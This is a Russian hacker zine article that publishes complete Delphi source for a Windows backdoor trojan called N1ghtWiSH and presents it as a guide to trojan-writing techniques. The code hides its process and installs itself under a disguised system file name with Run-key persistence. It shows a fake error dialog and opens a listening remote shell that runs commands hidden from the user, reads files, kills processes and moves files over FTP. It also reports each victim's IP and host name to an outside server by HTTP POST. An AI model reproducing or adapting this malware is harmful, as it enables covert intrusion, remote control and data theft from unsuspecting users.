----------------------------------------------
#!/usr/share/doc/defaced/3/tandp/nightwish.txt
----------------------------------------------


                             [ N1ghtWiSH project ]
                         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[ by defaced staff ]

B14cKh47z fUck1n s7uFf - WTF??? 

Вы  спросите,  что  это за херня? это был закрытый релиз ZUDteam =)) Короче, вот
исходник  трояна для windoz. Тут есть несколько интересных техник, которые могут
помочь  при  написании троя. Стоит сказать, что код _не_ оптимизирован, тут есть
много лишнего, но это не важно. Цель - показать идею.

---------------------------------// N1ghtWiSH.dpr
program N1ghtWiSH;

uses
  Forms, Registry,
  main in 'main.pas' {Form1};

  procedure hidenow; external 'kernel32.dll' name 'RegisterServiceProcess';

{$R *.res}

var
VerReg: TRegistry;
winver: string;

begin
  Application.Initialize;
  Application.ShowMainForm:=false;
  Application.CreateForm(TForm1, Form1);

VerReg:=TRegistry.Create;
VerReg.RootKey:=$80000002;
VerReg.OpenKey('\Software\Microsoft\Windows\CurrentVersion',false);
winver:=VerReg.ReadString('Version');
if winver = 'Windows 98' then
                             begin
 try
    asm                          //  Я точно не знаю, в каких виндах кроме
    push 1                       //  98 работает register_service_process().
    push 0                       //  Поэтому такой гимор...
    call hidenow;                //
    end;
  except
  end;
                             end;
VerReg.CloseKey;
Application.Run;
end.


// _EOF_ N1ghtWiSH.dpr




---------------------------------// main.pas

unit main;

interface

// тут много лишнего vvvv 

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, Sockets, ExtCtrls, NMsmtp, ScktComp, StdCtrls,
  ComCtrls, FileCtrl, NMFtp, IdBaseComponent, IdComponent, IdTCPConnection,
  IdTCPClient, Psock, Registry,ShellAPI, IdRawBase, IdRawClient,
  IdIcmpClient;

type
  TForm1 = class(TForm)
    Watcher: TTimer;
    SNIF: TTcpServer;
    FList: TFileListBox;
    FTP: TNMFTP;
    CLIENT: TTcpClient;
    conffile: TListBox;
    CheckBox1: TCheckBox;
    procedure FormCreate(Sender: TObject);
    procedure SNIFAccept(Sender: TObject; ClientSocket: TCustomIpClient);
    procedure WatcherTimer(Sender: TObject);

  private
    //
  public
      procedure KillProc(ClassName: PChar; WindowTitle: PChar);
  end;

var
  Form1: TForm1;
  statstr,oldip,newip,winddir, autoruner, codename: string;
  ReG: TRegistry;
  onlineTime: integer;

implementation


{$R *.dfm}

procedure TForm1.FormCreate(Sender: TObject);
begin
onlineTime:=0;
ReG:=TRegistry.Create;
ReG.RootKey:=HKEY_LOCAL_MACHINE;
ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion',false);
winddir:=ReG.ReadString('SystemRoot');
if (FileExists(winddir+'\winass.dll')=true) and (FileExists(winddir+'\mstask666.exe')=true) then ConfFile.Items.LoadFromFile(winddir+'\winass.dll') else begin
        CopyFile(Pchar(Application.ExeName),Pchar(winddir+'\mstask666.exe'),FALSE);
        ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',false);
        Reg.WriteString('mstask666',winddir+'\mstask666.exe');
        Chdir(winddir);
        Random(500);
        Random(500);
        ConfFile.Items.Strings[0]:='ftp.somethere.ru';
        ConfFile.Items.Strings[1]:='LAMER';
        ConfFile.Items.Strings[2]:='LAMER';
        Randomize;
        ConfFile.Items.Strings[3]:=SNIF.LocalHostName+IntToStr(Random(500));
        ConfFile.Items.SaveToFile('winass.dll');
        fileSetAttr(winddir+'\mstask666.exe',faSysfile);
        fileSetAttr(winddir+'\winass.dll',faSysfile);
        Reg.CloseKey;
        MessageBox(handle,'Sorry, but some wrong! Please, remove this file!','Error',MB_ICONWARNING);
        Application.Terminate;
        end;
ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',false);
if ReG.ValueExists('mstask666')= false then Reg.WriteString('mstask666',winddir+'\mstask666.exe');
reg.CloseKey;
statstr:='null';
SNIF.LocalPort:='31339';     //   PORT TO LISTEN
SNIF.Active:=true;
FTP.Host:=ConfFile.Items.Strings[0];
FTP.UserID:=ConfFile.Items.Strings[1];
FTP.Password:=ConfFile.Items.Strings[2];
codename:=confFile.Items.Strings[3];
Watcher.Enabled:=true;
end;


procedure TForm1.SNIFAccept(Sender: TObject;
  ClientSocket: TCustomIpClient);
var

cmd,welc,comm, frem,floc,banner,onliner : string;
blank,ind1,ind2,ind3: integer;
finder : TSearchRec;
Wnd : hWnd;
SysDate: TDateTime;
S: TStringList;
buff: ARRAY [0..127] OF Char;


begin
banner:=SNIF.LocalHostName;
if SNIF.LocalHostName = '' then banner:= SNIF.LocalHostAddr;
ClientSocket.Sendln('  Welcome to N1ghtWiSH ('+banner+'), Master !');
welc := SNIF.LocalHostName+'> ';
   while true do
   begin
        ClientSocket.Sendln('',#13#10);
        ClientSocket.Sendln(welc,'');
        cmd:=ClientSocket.Receiveln(#13#10);
        if cmd <> '' then
        begin
        if cmd = '?' then begin
                          ClientSocket.Sendln('ZUDteam N1ghtWiSH (Night Windows SHell =)',#13#10);
                          ClientSocket.Sendln('Nice to see you, Master!',#13#10);
                          ClientSocket.Sendln('',#13#10);
                          ClientSocket.Sendln('Commands:',#13#10);
                          ClientSocket.Sendln('system-info  - View some info about system',#13#10);     // ok
                          ClientSocket.Sendln('ftpput   - Upload file to ftp-serv',#13#10);   // ok
                          ClientSocket.Sendln('ftpget   - Download file from ftp-serv',#13#10);   // ok
                          ClientSocket.Sendln('dir   - view dir list',#13#10);                                     // ok
                          ClientSocket.Sendln('find  - searching files',#13#10);                                   // ok
                          ClientSocket.Sendln('findnext  - resume searching files',#13#10);
                          ClientSocket.Sendln('view  - file viewer',#13#10);                                      // ok
                          ClientSocket.Sendln('exec  - run any prog (you''l NOT see it!!!)',#13#10);              // ok
                          ClientSocket.Sendln('windows-list  - show list of all visible windows',#13#10);
                          ClientSocket.Sendln('process-list  - show processes on machine ',#13#10); //ok
                          ClientSocket.Sendln('process-kill  - kill process on machine ',#13#10);
                          ClientSocket.Sendln('windir  - display windows directory',#13#10); //ok
                          ClientSocket.Sendln('viewconf  - view current config',#13#10);             // ok
                          ClientSocket.Sendln('editconf  - set new config',#13#10);                  // ok
                          ClientSocket.Sendln('DIE-nahui - uninstall trojan',#13#10);
                          end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'exec' then
                          begin
                          ClientSocket.Sendln('YOU''L NOT SEE, WhAT GOING ON & USER CAN DETECT YOU!!! ',#13#10);
                          ClientSocket.Sendln('Are you sure (crazy;) ? [y/n] :','');
                          comm:=ClientSocket.Receiveln(#13#10);
                          if comm = 'y' then begin
                                        ClientSocket.Sendln('Ok, enter command: ','');
                                        comm:=ClientSocket.Receiveln(#13#10);
                                        WinExec(Pchar(comm),SW_HIDE);
                                        end
                          else ClientSocket.Sendln('exec aborted (yeah...)',#13#10);
                          end
////////////////////////////////////////////////////////////////////////////////////////////////        

else if cmd = 'windir' then begin
                               ClientSocket.Sendln('Windows dir: '+winddir,#13#10);
                               end
////////////////////////////////////////////////////////////////////////////////////////////////        

else if cmd = 'system-info' then begin
                               ClientSocket.Sendln('---==[ SOME SYSTEM INFO ]==---',#13#10);
                               Sysdate:=Time;
                               ClientSocket.Sendln('',#13#10);
                               ClientSocket.Sendln('Date: '+DateToStr(SysDate),#13#10);
                               ClientSocket.Sendln('Time: '+TimeToStr(SysDate),#13#10);
                               if onlineTime < 60 then onliner:='00:00:'+IntToStr(OnlineTime)
                               else if onlineTime< 3600 then begin
                                                             onliner:='00:'+IntToStr(OnlineTime div 60)+':'+IntTOStr(OnlineTime mod 60);
                                                             end
                               else begin
                                    onliner:=IntTOStr(OnLineTime div 3600)+':'+IntTOStr((OnLineTime mod 3600) div 60)+':'+IntToStr((OnLineTime mod 3600) mod 60);

                                    end;
                               ClientSocket.Sendln('Time ONLINE: '+onliner,#13#10);
                               end
////////////////////////////////////////////////////////////////////////////////////////////////

        else if cmd = 'dir' then  begin
                                  ClientSocket.Sendln('Enter path: ','');
                                  comm:=ClientSocket.Receiveln(#13#10);
                                  if DirectoryExists(comm)= false then  ClientSocket.Sendln('dir ('+comm+') not exist',#13#10)
                                  else begin

                                  Flist.Directory:=comm;
                                  if flist.Items.Count >0 then
                                     begin
                                     ind2:=0;
                                     ClientSocket.Sendln('------------------------------[ Files here: '+IntTOStr(flist.Items.Count)+']--',#13#10);
                                        while ind2 <= (flist.Items.Count-1) do
                                                begin
                                                        if StrLen(Pchar(flist.Items.Strings[ind2])) < 30 then begin
                                                                                                         ClientSocket.Sendln(flist.items.Strings[ind2],'');
                                                                                                           for blank:=0 to  (30-StrLen(Pchar(flist.Items.Strings[ind2]))) do
                                                                                                           begin
                                                                                                           ClientSocket.Sendln(' ','');
                                                                                                           end;
                                                                                                         end
                                                        else begin
                                                             ClientSocket.Sendln(flist.items.Strings[ind2],#13#10);
                                                             end;

                                                        if (ind2+1)<=(flist.Items.Count-1) then ClientSocket.Sendln(flist.items.Strings[ind2+1]+'   ',#13#10)
                                                        else  ClientSocket.Sendln('',#13#10);
                                                ind2 := ind2+2;
                                                end;
                                     end;
                                  end;

                                  end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'process-list' then  begin
                                Wnd := GetWindow(Handle, gw_HWndFirst);
                                        ClientSocket.Sendln('-------------------------------------[ Process list: ]--',#13#10);
                                        while Wnd <> 0 do
                                        begin
                                            IF //(Wnd <> Application.Handle) AND {-Собственное окно}
                                            (IsWindowVisible(Wnd)or checkbox1.checked) AND {-Невидимые окна}
                                            ((GetWindow(Wnd, gw_Owner) = 0)or checkbox1.checked) AND {-Дочернии окна}
                                            (GetWindowText(Wnd, buff, sizeof(buff)) <> 0) {-Окна без заголовков}
                                        then begin
                                          GetWindowText(Wnd, buff, sizeof(buff));
                                          ClientSocket.Sendln(buff,#13#10);
                                        end;
                                        Wnd := GetWindow(Wnd, gw_hWndNext);
                                        end;

                                  end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'windows-list' then  begin
                                Wnd := GetWindow(Handle, gw_HWndFirst);
                                        while Wnd <> 0 do
                                        begin
                                        if IsWindowVisible(Wnd) and
                                        (GetWindow(Wnd, gw_Owner) = 0) and
                                        (GetWindowText(Wnd, buff, sizeof(buff)) <> 0)
                                        then begin
                                          GetWindowText(Wnd, buff, sizeof(buff));
                                          ClientSocket.Sendln((StrPas(buff)),#13#10);
                                        end;
                                        Wnd := GetWindow(Wnd, gw_hWndNext);
                                        end;

                                  end

////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'process-kill' then  begin
                                  ClientSocket.Sendln('Window caption: ','');
                                  comm:=ClientSocket.Receiveln(#13#10);
                                  if comm <> '' then Form1.KillProc(nil,pchar(comm));
                                  end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'find' then begin
                                  ClientSocket.Sendln('Searchmask (i.e. "c:\Windoz\*.txt"): ','');
                                  comm:=ClientSocket.Receiveln(#13#10);
                                  FindFirst(comm,$0000003F,finder);
                                  ClientSocket.Sendln(finder.Name,#13#10);
                                  finder.Name:='None';
                                  end
        else if cmd = 'findnext' then begin
                                  FindNext(finder);
                                  ClientSocket.Sendln(finder.Name,#13#10);
                                  finder.Name:='None';
                                  end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'view' then begin
                                  ClientSocket.Sendln('File localion (i.e. c:\win\Suprpass.txt): ','');
                                  comm:=ClientSocket.Receiveln(#13#10);
                                  if FileExists(comm) = false then ClientSocket.Sendln(' file not exists',#13#10) else
                                       begin
                                         try
                                         S:= TStringList.Create;
                                         S.LoadFromFile(comm);
                                         ClientSocket.Sendln('-----------------------------------------------[ Strings: '+IntToStr(S.Count)+']--',#13#10);
                                            for ind1:= 0 to s.Count-1 do ClientSocket.Sendln(s.Strings[ind1],#13#10);
                                         except
                                         ClientSocket.Sendln('[!] Cant view!',#13#10);
                                         end;
                                         end;
                                  S.Destroy;
                                  end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'ftpput' then  begin
                                  ClientSocket.Sendln('--- FTP UTILITY v 1.00 ---',#13#10);
                                  try
                                  FTP.Connect;
                                  ind3:=1;
                                  ClientSocket.Sendln('Connected 2 ftp-serv ;) have PHUN!',#13#10);
                                  ClientSocket.Sendln('Local File: ','');
                                  floc := ClientSocket.Receiveln(#13#10);
                                  ClientSocket.Sendln('Remote File: ','');
                                  frem := ClientSocket.Receiveln(#13#10);
                                  if (FileExists(floc) = false) then
                                      begin
                                      ClientSocket.Sendln('Local File not ExIST!',#13#10);
                                      ind3:=0;
                                      end;
                                  if (ind3 = 1) then FTP.Upload(floc,frem);
                                  FTP.Disconnect;
                                  except
                                        ClientSocket.Sendln('[!] Error !',#13#10);
                                  end;
                                  end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'ftpget' then  begin
                                  ClientSocket.Sendln('--- FTP UTILITY v 1.00 ---',#13#10);
                                  try
                                  FTP.Connect;
                                  ind3:=1;
                                  ClientSocket.Sendln('Connected 2 ftp-serv ;) have PHUN!',#13#10);
                                  ClientSocket.Sendln('Remote File: ','');
                                  frem := ClientSocket.Receiveln(#13#10);
                                  ClientSocket.Sendln('Local File: ','');
                                  floc := ClientSocket.Receiveln(#13#10);
                                      if (FileExists(floc) = true) then
                                      begin
                                      ClientSocket.Sendln('tHis file already exists!',#13#10);
                                      ind3:=0;
                                      end;
                                  if (ind3 = 1) then FTP.Download(frem,floc);
                                  FTP.Disconnect;
                                  except
                                        ClientSocket.Sendln('[!] Error! ',#13#10);
                                  end;
                                  end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'viewconf' then begin
                                      ClientSocket.Sendln(' - Current N1ghtWiSH conf -',#13#10);
                                      ClientSocket.Sendln('System codename: '+codename,#13#10);
                                      ClientSocket.Sendln('Ftp-server: '+ConfFile.Items.Strings[0],#13#10);
                                      ClientSocket.Sendln('Login: '+ConfFile.Items.Strings[1],#13#10);
                                      ClientSocket.Sendln('Password: '+ConfFile.Items.Strings[2],#13#10);
                                      end
////////////////////////////////////////////////////////////////////////////////////////////////
        else if cmd = 'DIE-nahui' then begin
                                       ClientSocket.Sendln(' -=DIE Haxyu`=- SELF-DESTROING MODE',#13#10);
                                       ClientSocket.Sendln('ARE YOU SURE? Type "B-nu39y-BCE" for start uninstall : ','');
                                       comm := ClientSocket.Receiveln(#13#10);
                                       if comm <> 'B-nu39y-BCE' then ClientSocket.Sendln(' - DESTROING CANCELED!',#13#10) else begin
                                               Reg:=TREgistry.Create;
                                               ReG.RootKey:=HKEY_LOCAL_MACHINE;
                                               ReG.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',false);
                                               if Reg.ValueExists('mstask666') = true then Reg.DeleteValue('mstask666') else ClientSocket.Sendln('Cannot uNinStall ! prog is not in registry',#13#10);
                                               Reg.CloseKey;
                                               ClientSocket.Sendln(' - SELF-DESTROING IS ENABLED !!!',#13#10);
                                               ClientSocket.Sendln(' GOOD BYE, MASTER !  ;((( ',#13#10);
                                               Sleep(1000);
                                                  try
                                                  ShellExecute(handle,'open','rundll32','user,disableoemlayer',nil,SW_SHOWNORMAL);
                                                  except
                                                  end;
                                               end;
                                       end
////////////////////////////////////////////////////////////////////////////////////////////////

       else if cmd = 'editconf' then begin
                                      ClientSocket.Sendln(' - Seting new N1ghtWiSH conf -',#13#10);
                                      ClientSocket.Sendln('Ftp-server: ','');
                                      comm := ClientSocket.Receiveln(#13#10);
                                      ConfFile.Items.Strings[0]:=comm;
                                      ClientSocket.Sendln('Login: ','');
                                      comm := ClientSocket.Receiveln(#13#10);
                                      ConfFile.Items.Strings[1]:= comm;
                                      ClientSocket.Sendln('Password: ','');
                                      comm := ClientSocket.Receiveln(#13#10);
                                      ConfFile.Items.Strings[2]:=comm;
                                      ClientSocket.Sendln(' OK, Look at new setings: ',#13#10);
                                      ClientSocket.Sendln('Ftp-server: '+ConfFile.Items.Strings[0],#13#10);
                                      ClientSocket.Sendln('Login: '+ConfFile.Items.Strings[1],#13#10);
                                      ClientSocket.Sendln('Password: '+ConfFile.Items.Strings[2],#13#10);
                                      ClientSocket.Sendln('LOAD NEW SETTINGS? [y/n]: ','');
                                      comm := ClientSocket.Receiveln(#13#10);
                                      chDir(winddir);
                                      if comm = 'y' then begin
                                                                FTP.Host:=ConfFile.Items.Strings[0];
                                                                FTP.UserID:=ConfFile.Items.Strings[1];
                                                                FTP.Password:=ConfFile.Items.Strings[2];
                                                                ConfFile.Items.SaveToFile('winass.dll');
                                                         end
                                      else ConfFile.Items.LoadFromFile('winass.dll');
                                      end
////////////////////////////////////////////////////////////////////////////////////////////////
        else ClientSocket.Sendln('! Unknown command (try "?" to get some info)',#13#10);
        end;
   end;

end; // IFAccept END

procedure TForm1.WatcherTimer(Sender: TObject);
var
myip,hostnam,date,sendstr1: String;
curDate: TDateTime;
len: integer;
begin

        if SNIF.LocalHostAddr <> '127.0.0.1' then begin
                if statstr = 'null' then begin
                        statstr:='31337';
                        myip :=SNIF.LocalHostAddr;
                        curDate:=Time;
                        date := DateToStr(curDate)+'  '+TimeToStr(curDate) ;
                        hostNam:=SNIF.LookupHostName(myip);
                        sendstr1 := 'action=add&addr='+myip+'&host='+hostnam+'&codename='+codename+'&time='+date+'&os=win';
                        len := StrLen(Pchar(sendstr1));
                        CLIENT.Active:=true;
                        CLIENT.RemoteHost:='133.133.133.133';
                        CLIENT.RemotePort:='80';
                        try
                                if (CLIENT.Connect) = true then
                                begin
                                CLIENT.Sendln('POST /cgi-bin/nightwish.cgi HTTP/1.1',#13#10);
                                CLIENT.Sendln('Host: statistics.hosting.net',#13#10);
                                CLIENT.Sendln('Content-Type: application/x-www-url-formencoded',#13#10);
                                CLIENT.Sendln('Content-Length: '+IntToStr(len),#13#10);
                                CLIENT.Sendln('',#13#10);
                                CLIENT.Sendln(sendstr1,#13#10);
                                CLIENT.Disconnect;
                                end;
                        except
                        end;
                end else onlineTime:=onlinetime+10;;
        end else
        begin
                statstr := 'null';
        end;
end;

procedure TForm1.KillProc(ClassName: PChar; WindowTitle: PChar);
const
  PROCESS_TERMINATE = $0001;
var
  ProcessHandle : THandle;
  ProcessID: Integer;
  TheWindow : HWND;
begin
  TheWindow := FindWindow(Classname, WindowTitle);
  GetWindowThreadProcessID(TheWindow, @ProcessID);
  ProcessHandle := OpenProcess(PROCESS_TERMINATE, FALSE, ProcessId);
  TerminateProcess(ProcessHandle,4);
end;

end.


// _EOF_ main.pas